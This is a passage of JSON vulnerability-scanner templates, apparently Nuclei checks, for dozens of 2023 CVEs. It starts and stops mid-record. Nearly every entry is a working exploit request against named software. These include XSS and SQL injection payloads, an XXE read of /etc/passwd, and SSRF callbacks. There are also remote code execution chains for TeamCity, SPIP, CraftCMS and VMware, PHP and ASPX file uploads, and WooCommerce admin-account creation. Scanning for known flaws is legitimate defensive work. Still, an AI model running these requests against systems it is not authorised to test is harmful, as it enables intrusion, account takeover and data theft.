Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain)","{{BaseURL}}/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain)"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cancel\" href=\"javascript:alert(document.domain)"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200,401]}]}]},{"id":"CVE-2023-27922","info":{"name":"Newsletter < 7.6.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=newsletter_system_status&a%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"text/html\")","contains(tolower(body_2), \"_newsletter_\")","contains(body_2, \"><script>alert(document_domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-41597","info":{"name":"EyouCms v1.6.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","part":"body","words":["eyoucms","ey_fleshVerify"],"condition":"or","internal":true,"case-insensitive":true}]},{"method":"GET","path":["{{BaseURL}}/admin/twitter.php?active_t=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27159","info":{"name":"Appwrite <=1.2.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/avatars/favicon?url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Appwrite-Server"]}]}]},{"id":"CVE-2023-3345","info":{"name":"LMS by Masteriyo < 1.6.8 - Information Exposure","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/profile.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/masteriyo/v1/users/ HTTP/1.1\nHost: {{Hostname}}\nX-WP-Nonce: {{nonce}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["\"username\":","\"email\":","\"roles\":"],"condition":"and"},{"type":"word","part":"header_3","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"nonce\":\"([a-z0-9]+)\",\"versionString"],"internal":true}]}]},{"id":"CVE-2023-42793","info":{"name":"JetBrains TeamCity < 2023.05.4 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\nContent-Type: application/x-www-form-urlencoded\n","POST /admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\nContent-Type: application/x-www-form-urlencoded\n","POST /app/rest/debug/processes?exePath=echo&params={{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<token name=\"RPC2\" creationTime"]},{"type":"word","part":"body_5","words":["StdOut:{{randstr}}"]}],"extractors":[{"type":"regex","part":"body_2","name":"token","group":1,"regex":["value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2023-6505","info":{"name":"Prime Mover < 1.9.3 - Sensitive Data Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/prime-mover-export-files/1/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Index of /wp-content/uploads/prime-mover-export-files/1",".wprime"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-20887","info":{"name":"VMware VRealize Network Insight - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /saas./resttosaasservlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-thrift\n\n[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"1111\"},\"2\":{\"str\":\"`{{cmd}}`\"},\"3\":{\"str\":\"value3\"},\"4\":{\"lst\":[\"str\",2,\"AAAA\",\"BBBB\"]}}]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"rec\":"]},{"type":"word","part":"header","words":["application/x-thrift"]},{"type":"word","part":"body","negative":true,"words":["Provided invalid node Id","Invalid nodeId"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2130","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/suppliers/view_details.php?id=1'+AND+(SELECT+9687+FROM+(SELECT(SLEEP(6)))pnac)+AND+'ARHJ'='ARHJ"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"Supplier Name\")"],"condition":"and"}]}]},{"id":"CVE-2023-47115","info":{"name":"Label Studio - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["GET /user/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /user/signup/?&next=/projects/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrfmiddlewaretoken={{csrftoken}}&email={{randstr_1}}%40{{randstr_1}}.{{randstr_1}}&password={{randstr_2}}&allow_newsletters=false\n","GET /api/current-user/whoami HTTP/1.1\nHost: {{Hostname}}\n","POST /api/users/{{id}}/avatar/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarytZZRQ9D2LS0PMsHF\n\n------WebKitFormBoundarytZZRQ9D2LS0PMsHF\nContent-Disposition: form-data; name=\"avatar\"; filename=\"nuclei.html\"\nContent-Type: image/png\n\n{{hex_decode(\"89504E470D0A1A0A0000000D4948445200000009000000080802000000A4AF42E200000046494441543C7363726970743E616C65727428646F63756D656E742E646F6D61696E293C2F7363726970743E\")}}\n------WebKitFormBoundarytZZRQ9D2LS0PMsHF\n","GET /api/current-user/whoami HTTP/1.1\nHost: {{Hostname}}\n","GET {{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"xpath","name":"csrftoken","internal":true,"attribute":"value","xpath":["/html/body/div/form/input"]},{"type":"json","part":"body","name":"id","internal":true,"json":[".id"]},{"type":"json","part":"body","name":"filename","internal":true,"json":[".avatar"]}],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, 'text/html')","contains(body, \"<script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-27372","info":{"name":"SPIP - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /spip.php?page=spip_pass HTTP/1.1\nHost: {{Hostname}}\n","POST /spip.php?page=spip_pass HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=spip_pass&formulaire_action=oubli&formulaire_action_args={{csrf}}&oubli=s:19:\"<?php phpinfo(); ?>\";\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["PHP Extension","PHP Version","<!DOCTYPE html"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name='formulaire_action_args'[^>]*value='([^']*)'"],"internal":true,"part":"body_1"},{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body_2"}]}]},{"id":"CVE-2023-37728","info":{"name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27","{{BaseURL}}/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(header, \"IceWarp\") || contains(body, \"IceWarp WebClient\")","contains(body, \"<img src onerror=alert(document.domain)>\")"],"condition":"and"}]}]},{"id":"CVE-2023-28432","info":{"name":"MinIO Cluster Deployment - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /minio/bootstrap/v1/verify HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"MINIO_ROOT_PASSWORD\":","\"MINIO_ROOT_USER\":","\"MinioEnv\":"],"condition":"or"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-28121","info":{"name":"WooCommerce Payments - Unauthorized Admin Access","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nX-WCPAY-PLATFORM-CHECKOUT-USER: 1\nContent-Type: application/x-www-form-urlencoded\n\nrest_route=%2Fwp%2Fv2%2Fusers&username={{username}}&email={{email}}&password={{password}}&roles=administrator\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"registered_date\":","\"username\":","\"email\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[201]}],"extractors":[{"type":"dsl","dsl":["\"WP_USERNAME: \"+ username","\"WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-3846","info":{"name":"MooDating 1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"><img src=a onerror=alert(document.domain)>\", \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-2023","info":{"name":"Custom 404 Pro < 3.7.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=c4p-main&s={{randstr}}%22%20style=animation-name:rotation%20onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")","contains(body_2, \"Custom 404 Pro\")"],"condition":"and"}]}]},{"id":"CVE-2023-0942","info":{"name":"WordPress Japanized for WooCommerce <2.5.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wc4jp-options&tab=a</script><svg/onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\") && contains(body_2, \"woocommerce-for-japan\")"],"condition":"and"}]}]},{"id":"CVE-2023-24489","info":{"name":"Citrix ShareFile StorageZones Controller - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /documentum/upload.aspx?parentid={{url_encode(padding)}}&raw=1&unzip=on&uploadid={{fileName}}\\..\\..\\..\\cifs&filename={{fileName}}.aspx HTTP/1.1\nHost: {{Hostname}}\n\n<%@ Page Language=\"C#\" Debug=\"true\" Trace=\"false\" %>\n<script Language=\"c#\" runat=\"server\">\nvoid Page_Load(object sender, EventArgs e)\n{\n    Response.Write(\"{{randstr}}\");\n}\n</script>\n"],"payloads":{"padding":"helpers/payloads/citrix_paddings.txt"},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["body == \"ERROR: The method or operation is not implemented.\"","status_code == 200"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["BaseURL+ \"/cifs/\" + fileName + \".aspx\""]}]}]},{"id":"CVE-2023-27587","info":{"name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","severity":"medium"},"requests":[{"raw":["POST /api/add-article-by-text HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/json\n\n{\n  \"title\":\"Kernsicherheitstest\",\n  \"body\":\"Kernsicherheitstest\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains((body), 'https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=REDACTED')"]},{"type":"word","words":["Caused by:","TTS request failed"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-20888","info":{"name":"VMware Aria Operations for Networks - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /api/auth/login HTTP/2\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Vrni-Csrf-Token: null\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n","POST /api/events/push-notifications HTTP/2\nHost: {{Hostname}}\nX-Vrni-Csrf-Token: {{csrf}}\nContent-Type: application/json\n\n{\"endOffset\": \"{{ generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\") }} \"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["csrfToken\":\"([a-z0-9A-Z/+=]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-42344","info":{"name":"OpenCMS - XML external entity (XXE)","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/opencms/cmisatom/cmis-online/query","{{BaseURL}}/cmisatom/cmis-online/query"],"headers":{"Content-Type":"application/xml;charset=UTF-8","Referer":"{{RootURL}}"},"body":"<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><cmis:query xmlns:cmis=\"<http://docs.oasis-open.org/ns/cmis/core/200908/>\"><cmis:statement>&test;</cmis:statement><cmis:searchAllVersions>false</cmis:searchAllVersions><cmis:includeAllowableActions>false</cmis:includeAllowableActions><cmis:includeRelationships>none</cmis:includeRelationships><cmis:renditionFilter>cmis:none</cmis:renditionFilter><cmis:maxItems>100</cmis:maxItems><cmis:skipCount>0</cmis:skipCount></cmis:query>\n","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","invalidArgument"],"condition":"and"}]}]},{"id":"CVE-2023-3765","info":{"name":"MLflow Absolute Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"is_dir\":","\"path\":","\"files\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-25346","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","GET /v2/person/not-found?id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-4168","info":{"name":"Adlisting Classified Ads 2.14.0 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"google_map_key\", \"api_key\", \"auth_domain\")"],"condition":"and"}]}]},{"id":"CVE-2023-4115","info":{"name":"PHPJabbers Cleaning Business 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFront&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Enquiry summary\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-1546","info":{"name":"MyCryptoCheckout < 2.124 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=mycryptocheckout&tab=autosettlements&\"><script>alert(/XSS/)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"scriptalert(/XSS/)/script\")","contains(body_2, \"mycryptocheckout\")"],"condition":"and"}]}]},{"id":"CVE-2023-30868","info":{"name":"Tree Page View Plugin < 1.6.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"text/html\")","contains(body_2, \"%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\") && contains(body_2, \"CMS Tree Page View\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-48241","info":{"name":"XWiki < 4.10.15 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/get/XWiki/SuggestSolrService?outputSyntax=plain&media=json&nb=1000&query=q%3D*%3A*%0Aq.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C+reference%2C+links%2C+doccontentraw_%2C+objcontent__&input=+","{{BaseURL}}/xwiki/bin/get/XWiki/SuggestSolrService?outputSyntax=plain&media=json&nb=1000&query=q%3D*%3A*%0Aq.op%3DAND%0Afq%3Dtype%3ADOCUMENT%0Afl%3Dtitle_%2C+reference%2C+links%2C+doccontentraw_%2C+objcontent__&input=+"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"reference\":","title_\":"],"condition":"or"},{"type":"dsl","dsl":["contains(body, \"services.localization.render\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-48023","info":{"name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/log_proxy?url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2023-6114","info":{"name":"Duplicator < 1.5.7.1; Duplicator Pro < 4.5.14.2 - Unauthenticated Sensitive Data Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/backups-dup-lite/tmp/","{{BaseURL}}/wp-content/backups-dup-pro/tmp/"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, '/tmp') && contains(body, '<title>Index of')"],"condition":"and"}]}]},{"id":"CVE-2023-2009","info":{"name":"Pretty Url <= 1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog=((username))&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=prettyurls HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=prettyurls HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dprettyurls&id=&category=accordions%7Epost_type&url=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&meta_title=&meta_description=&meta_keyword=\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<img src=x onerror=alert(document.domain)>\")","contains(body_3, \"prettyurls\")"],"condition":"and"}],"extractors":[{"type":"regex","internal":true,"name":"nonce","part":"body","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"]}]}]},{"id":"CVE-2023-41265","info":{"name":"Qlik Sense Enterprise - HTTP Request Smuggling","severity":"critical"},"requests":[{"raw":["GET /resources/qmc/fonts/CVE-2023-41265.ttf HTTP/1.1\nHost: {{Hostname}}\nCookie: X-Qlik-Session=13333333-3333-3333-3333-333333333337\nContent-Type: text/html\nContent-Length: 5\nTransfer-Encoding: chunked\n\n;\n\n"],"unsafe":true,"matchers":[{"type":"dsl","dsl":["status_code == 400","contains(to_lower(set_cookie), 'x-qlik-session')","contains(header, 'Bad Request')"],"condition":"and"}]}]},{"id":"CVE-2023-20864","info":{"name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /csrf HTTP/1.1\nHost: {{Hostname}}\nX-Csrf-Token: Fetch\n","POST /api/v2/internal/cluster/applyMembership HTTP/1.1\nHost: {{Hostname}}\nX-CSRF-Token: {{xcsrftoken}}\nContent-type: application/octet-stream\n\n{{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"raw\")}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["\"errorMessage\":\"Internal error"]}],"extractors":[{"type":"kval","name":"xcsrftoken","group":1,"internal":true,"kval":["X_CSRF_Token"]}]}]},{"id":"CVE-2023-36346","info":{"name":"POS Codekop v2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/print.php?nm_member=<script>alert(document.location)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.location)</script>","<title>print</title>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6379","info":{"name":"OpenCMS 14 & 15 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["/tagebuch/eintraege/index.html?reloaded&page=1\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/list-editor/index.html?reloaded&page=3\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/lists/compact/index.html?reloaded&sort=date_desc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/lists/elaborate/index.html?reloaded&sort=date_desc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/lists/masonry/index.html?reloaded&sort=date_asc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/blog/articles/index.html?reloaded&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E","/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1\"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1","/content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>\" />","OpenCms"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39598","info":{"name":"IceWarp Email Client - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?mid={{to_lower(rand_base(4))}}\"><img src=x onerror=confirm(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img src=x onerror=confirm(document.domain)>","icewarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4596","info":{"name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe\n\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"textarea-1\"\n\n{{randstr}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"phone-1\"\n\n{{rand_int(10)}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"email-1\"\n\ntest@gmail.com\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"name-1\"\n\n{{randstr}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"postdata-1-post-image\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"forminator_nonce\"\n\n{{forminator_nonce}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"form_id\"\n\n{{form_id}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"current_url\"\n\n{{BaseURL}}\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\nContent-Disposition: form-data; name=\"action\"\n\nforminator_submit_form_custom-forms\n------WebKitFormBoundaryBLOYSueQAdgN2PRe\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Upload file</label>","forminator-field-upload"],"condition":"and"},{"type":"word","part":"body_2","words":["{\"success\":true","\"form_id\":\"{{form_id}}\"","\"behav"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"forminator_nonce","part":"body","group":1,"regex":["name=\"forminator_nonce\" value=\"([a-z0-9]+)\" \\/>"],"internal":true},{"type":"regex","name":"form_id","part":"body","group":1,"regex":["name=\"form_id\" value=\"([0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2023-41892","info":{"name":"CraftCMS < 4.4.15 - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=conditions/render&test[userCondition]=craft\\elements\\conditions\\users\\UserCondition&config={\"name\":\"test[userCondition]\",\"as xyz\":{\"class\":\"\\\\GuzzleHttp\\\\Psr7\\\\FnStream\",    \"__construct()\": [{\"close\":null}],\"_fn_close\":\"phpinfo\"}}\n"],"matchers":[{"type":"word","words":["PHP Credits","PHP Group","CraftCMS"],"condition":"and","case-insensitive":true}]}]},{"id":"CVE-2023-2732","info":{"name":"MStore API <= 3.9.2 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /wp-json/wp/v2/add-listing?id=1 HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /wp-admin/profile.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["email-description","Username"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3848","info":{"name":"MooDating 1.2 - Cross-site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/viewi1omd\"><img%20src%3da%20onerror%3dalert(document.domain)>l43yn/108?tab=activity"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"<img src=a onerror=alert(document.domain)>\", 